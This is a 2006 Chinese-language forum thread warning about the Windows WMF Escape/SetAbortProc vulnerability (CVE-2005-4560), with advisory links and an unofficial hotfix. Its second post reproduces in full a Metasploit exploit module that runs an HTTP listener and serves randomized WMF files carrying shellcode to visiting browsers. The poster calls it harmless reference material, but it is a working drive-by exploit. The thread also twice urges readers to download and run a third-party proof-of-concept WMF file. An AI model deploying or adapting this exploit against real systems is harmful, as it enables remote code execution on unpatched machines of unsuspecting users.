倍可親

回復: 2
列印 上一主題 下一主題

最新微軟病毒, 請注意!!!!!

[複製鏈接]

7

主題

155

帖子

43

積分

貝殼新手上路

大一新生(四級)

Rank: 2

積分
43
跳轉到指定樓層
樓主
[B]微軟對此已漏洞於北美中部時間1/5/2005下午4:30分左右發布最新補丁, 請速下載:
http://windowsupdate.microsoft.com [/B][/SIZE][/COLOR]


[B]微軟設定於下周二發布最新補丁,在此之前請小心打開任何不可信的圖像!!詳情如下[/SIZE][/B][/COLOR]

中文:
http://antivirus.hinet.net/secureinfo/popup.php?cert_id=HiNet-2005-0189
http://www.gsn-cert.nat.gov.tw/gsn.php?chtip=HiNet-2006-0001

英文:
http://www.microsoft.com/technet/security/advisory/912840.mspx
http://www.eweek.com/article2/0,1895,1906177,00.asp


被侵犯的計算機會類似於這些照片:
注意背景被更換,安全中心被關閉, 而且會跳出窗口讓用戶填寫信用卡信息!
[/COLOR][/SIZE]





[B]測試你的系統是否會中毒!!!

右鍵單擊, 下載下面文件, 雙擊下載后的文件. 你會發現"Calc.exe"被打開, 然後跳出Explorer錯誤"Run DLL as an App".  

如果有上述情況, 你的電腦就有中毒可能.

剛果本人已經測試過, 除測試系統是否會中毒外不會對系統有負面影響.

[/COLOR][/B][/SIZE]

http://sipr.net/test.wmf


[B]
解決方式:
1. BackChina主頁所提到的避免方式已經不能緩解最新版的病毒/惡意軟體
2. 暫時最新和最完全的解除方式, 下載並安裝下面任何一個exe文件, 等待微軟發布正式補丁時再用程序卸載中心卸載此軟體
[/COLOR][/B][/SIZE]

http://www.grc.com/miscfiles/wmffix_hexblog14.exe
http://handlers.sans.org/tliston/wmffix_hexblog14.exe
http://castlecops.com/modules.ph ... p=getit&lid=496

7

主題

155

帖子

43

積分

貝殼新手上路

大一新生(四級)

Rank: 2

積分
43
沙發
 樓主| 剛果共和國 發表於 2006-1-4 04:09 | 只看該作者
[B]法國安全事件反應團(FrSIRT)發布惡意漏洞源碼:(本碼並不能帶來危害,只供參考)[/B][/COLOR][/SIZE]

  1. ##
  2. # This file is part of the Metasploit Framework and may be redistributed
  3. # according to the licenses defined in the Authors field below. In the
  4. # case of an unknown or missing license, this file defaults to the same
  5. # license as the core Framework (dual GPLv2 and Artistic). The latest
  6. # version of the Framework can always be obtained from metasploit.com.
  7. ##

  8. package Msf::Exploit::ie_xp_pfv_metafile;

  9. use strict;
  10. use base "Msf::Exploit";
  11. use Pex::Text;
  12. use IO::Socket::INET;

  13. my $advanced =
  14. {
  15. };

  16. my $info =
  17. {
  18. 'Name' => 'Windows XP/2003 Metafile Escape() SetAbortProc Code Execution',
  19. 'Version' => '$Revision: 1.9 $',
  20. 'Authors' =>
  21. [
  22. 'H D Moore <hdm [at] metasploit.com',
  23. 'san <san [at] xfocus.org>',
  24. 'O600KO78RUS[at]unknown.ru'
  25. ],

  26. 'Description' =>
  27. Pex::Text::Freeform(qq{
  28. This module exploits a vulnerability in the GDI library included with
  29. Windows XP and 2003. This vulnerability uses the 'Escape' metafile function
  30. to execute arbitrary code through the SetAbortProc procedure. This module
  31. generates a random WMF record stream for each request.
  32. }),

  33. 'Arch' => [ 'x86' ],
  34. 'OS' => [ 'win32', 'winxp', 'win2003' ],
  35. 'Priv' => 0,

  36. 'UserOpts' =>
  37. {
  38. 'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080 ],
  39. 'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', "0.0.0.0" ],
  40. },

  41. 'Payload' =>
  42. {
  43. 'Space' => 1000 + int(rand(256)) * 4,
  44. 'BadChars' => "\x00",
  45. 'Keys' => ['-bind'],
  46. },
  47. 'Refs' =>
  48. [
  49. ['BID', '16074'],
  50. ['CVE', '2005-4560'],
  51. ['OSVDB', '21987'],
  52. ['MIL', '111'],
  53. ['URL', 'http://wvware.sourceforge.net/caolan/ora-wmf.html'],
  54. ['URL', 'http://www.geocad.ru/new/site/Formats/Graphics/wmf/wmf.txt'],
  55. ],

  56. 'DefaultTarget' => 0,
  57. 'Targets' =>
  58. [
  59. [ 'Automatic - Windows XP / Windows 2003' ]
  60. ],

  61. 'Keys' => [ 'wmf' ],

  62. 'DisclosureDate' => 'Dec 27 2005',
  63. };

  64. sub new {
  65. my $class = shift;
  66. my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
  67. return($self);
  68. }

  69. sub Exploit
  70. {
  71. my $self = shift;
  72. my $server = IO::Socket::INET->new(
  73. LocalHost => $self->GetVar('HTTPHOST'),
  74. LocalPort => $self->GetVar('HTTPPORT'),
  75. ReuseAddr => 1,
  76. Listen => 1,
  77. Proto => 'tcp'
  78. );
  79. my $client;

  80. # Did the listener create fail?
  81. if (not defined($server)) {
  82. $self->PrintLine("[-] Failed to create local HTTP listener on " . $self->GetVar('HTTPPORT'));
  83. return;
  84. }

  85. my $httphost = $self->GetVar('HTTPHOST');
  86. if ($httphost eq '0.0.0.0') {
  87. $httphost = Pex::Utils::SourceIP('1.2.3.4');
  88. }

  89. $self->PrintLine("[*] Waiting for connections to http://". $httphost .":". $self->GetVar('HTTPPORT') ."/");

  90. while (defined($client = $server->accept())) {
  91. $self->HandleHttpClient(Msf::Socket::Tcp->new_from_socket($client));
  92. }

  93. return;
  94. }

  95. sub HandleHttpClient
  96. {
  97. my $self = shift;
  98. my $fd = shift;

  99. # Set the remote host information
  100. my ($rport, $rhost) = ($fd->PeerPort, $fd->PeerAddr);


  101. # Read the HTTP command
  102. my ($cmd, $url, $proto) = split / /, $fd->RecvLine(10);


  103. if ($url !~ /\.wmf/i) {
  104. $self->PrintLine("[*] HTTP Client connected from $rhost:$rport, redirecting...");

  105. # XXX This could be replaced by obfuscated javascript too...

  106. # Transmit the HTTP redirect response
  107. $fd->Send(
  108. "HTTP/1.0 302 Moved\r\n" .
  109. RandomHeaders().
  110. "Location: ". RandomPath() .".wmf\r\n" .
  111. "Content-Type: text/html\r\n" .
  112. "Content-Length: 0\r\n" .
  113. "Connection: close\r\n" .
  114. "\r\n"
  115. );

  116. $fd->Close();

  117. return;
  118. }

  119. my $shellcode = $self->GetVar('EncodedPayload')->Payload;

  120. # Push our minimum length just over the ethernet MTU
  121. my $pre_mlen = 1440 + rand(8192);
  122. my $suf_mlen = rand(8192)+128;

  123. # The number of random objects we generated
  124. my $fill = 0;

  125. # The buffer of random bogus objects
  126. my $pre_buff = "";
  127. my $suf_buff = "";

  128. while (length($pre_buff) < $pre_mlen && $fill < 65535) {
  129. $pre_buff .= RandomWMFRecord();
  130. $fill += 1;
  131. }

  132. while (length($suf_buff) < $suf_mlen && $fill < 65535) {
  133. $suf_buff .= RandomWMFRecord();
  134. $fill += 1;
  135. }

  136. my $clen = 18 + 8 + 6 + length($shellcode) + length($pre_buff) + length($suf_buff);
  137. my $content =
  138. #
  139. # WindowsMetaHeader
  140. #
  141. pack('vvvVvVv',
  142. # WORD FileType; /* Type of metafile (0=memory, 1=disk, 2=fjear) */
  143. int(rand(2))+1,
  144. # WORD HeaderSize; /* Size of header in WORDS (always 9) */
  145. 9,
  146. # WORD Version; /* Version of Microsoft Windows used */
  147. 0x0300,
  148. # DWORD FileSize; /* Total size of the metafile in WORDs */
  149. $clen/2,
  150. # WORD NumOfObjects; /* Number of objects in the file */
  151. $fill+1,
  152. # DWORD MaxRecordSize; /* The size of largest record in WORDs */
  153. int(rand(64)+8),
  154. # WORD NumOfParams; /* Not Used (always 0) */
  155. 0
  156. ).
  157. #
  158. # Filler data
  159. #
  160. $pre_buff.
  161. #
  162. # StandardMetaRecord - Escape()
  163. #
  164. pack('Vvv',
  165. # DWORD Size; /* Total size of the record in WORDs */
  166. 4,
  167. # WORD Function; /* Function number (defined in WINDOWS.H) */
  168. 0x0026, # Can also be 0xff26, 0x0626, etc...
  169. # WORD Parameters[]; /* Parameter values passed to function */
  170. 9,
  171. ). $shellcode .
  172. #
  173. # Filler data
  174. #
  175. $suf_buff.
  176. #
  177. # Complete the structure
  178. #
  179. pack('Vv',
  180. 3,
  181. 0
  182. );


  183. $self->PrintLine("[*] HTTP Client connected from $rhost:$rport, sending ".length($shellcode)."
  184. bytes of payload...");


  185. # Transmit the HTTP response
  186. my $req =
  187. "HTTP/1.0 200 OK\r\n" .
  188. "Content-Type: text/plain\r\n" .
  189. RandomHeaders().
  190. "Content-Length: " . length($content) . "\r\n" .
  191. "Connection: close\r\n" .
  192. "\r\n" .
  193. $content;


  194. my $res = $fd->Send($req);

  195. # Prevents IE from throwing an error in some cases
  196. select(undef, undef, undef, 0.1);

  197. $fd->Close();

  198. # The Content-Disposition trick was not very reliable (2003 ignores it)
  199. # "Content-Disposition: inline; filename=". Pex::Text::AlphaNumText(int(rand(1024)+1)) .".jpg\r\n".
  200. }


  201. sub RandomWMFRecord {
  202. my $type = int(rand(3));

  203. if ($type == 0) {
  204. # CreatePenIndirect
  205. return pack('Vv',
  206. 8,
  207. 0x02FA
  208. ). Pex::Text::RandomData(10)
  209. }
  210. elsif ( $type == 1 ) {
  211. # CreateBrushIndirect
  212. return pack('Vv',
  213. 7,
  214. 0x02FC
  215. ). Pex::Text::RandomData(8)
  216. }
  217. else {
  218. # Rectangle
  219. return pack('Vv',
  220. 7,
  221. 0x041B
  222. ). Pex::Text::RandomData(8)
  223. }
  224. }


  225. sub RandomHeaders {
  226. my $self = shift;
  227. my $head = '';

  228. while (length($head) < 3072) {
  229. $head .= "X-" .
  230. Pex::Text::AlphaNumText(int(rand(30) + 5)) . ': ' .
  231. Pex::Text::AlphaNumText(int(rand(256) + 5)) ."\r\n";
  232. }
  233. return $head;
  234. }


  235. sub RandomPath {
  236. my $self = shift;
  237. my $path = '';

  238. while (length($path) < 1024) {
  239. $path .= "/" . Pex::Text::AlphaNumText(int(rand(15) + 5));
  240. }
  241. return $path;
  242. }

  243. 1;
複製代碼
回復 支持 反對

使用道具 舉報

7

主題

155

帖子

43

積分

貝殼新手上路

大一新生(四級)

Rank: 2

積分
43
3
 樓主| 剛果共和國 發表於 2006-1-4 10:12 | 只看該作者

系統測試

[B]測試你的系統是否會中毒!!!

右鍵單擊, 下載下面文件, 雙擊下載后的文件. 你會發現"Calc.exe"被打開, 然後跳出Explorer錯誤"Run DLL as an App".  

如果有上述情況, 你的電腦就有中毒可能.

本人已經測試過, 除測試系統是否會中毒外不會對系統有負面影響.

[/COLOR][/B][/SIZE]

http://sipr.net/test.wmf
回復 支持 反對

使用道具 舉報

您需要登錄后才可以回帖 登錄 | 註冊

本版積分規則

關於本站 | 隱私權政策 | 免責條款 | 版權聲明 | 聯絡我們

Copyright © 2001-2013 海外華人中文門戶:倍可親 (http://big5.backchina.com) All Rights Reserved.

程序系統基於 Discuz! X3.1 商業版 優化 Discuz! © 2001-2013 Comsenz Inc.

本站時間採用京港台時間 GMT+8, 2025-7-23 02:34

快速回復 返回頂部 返回列表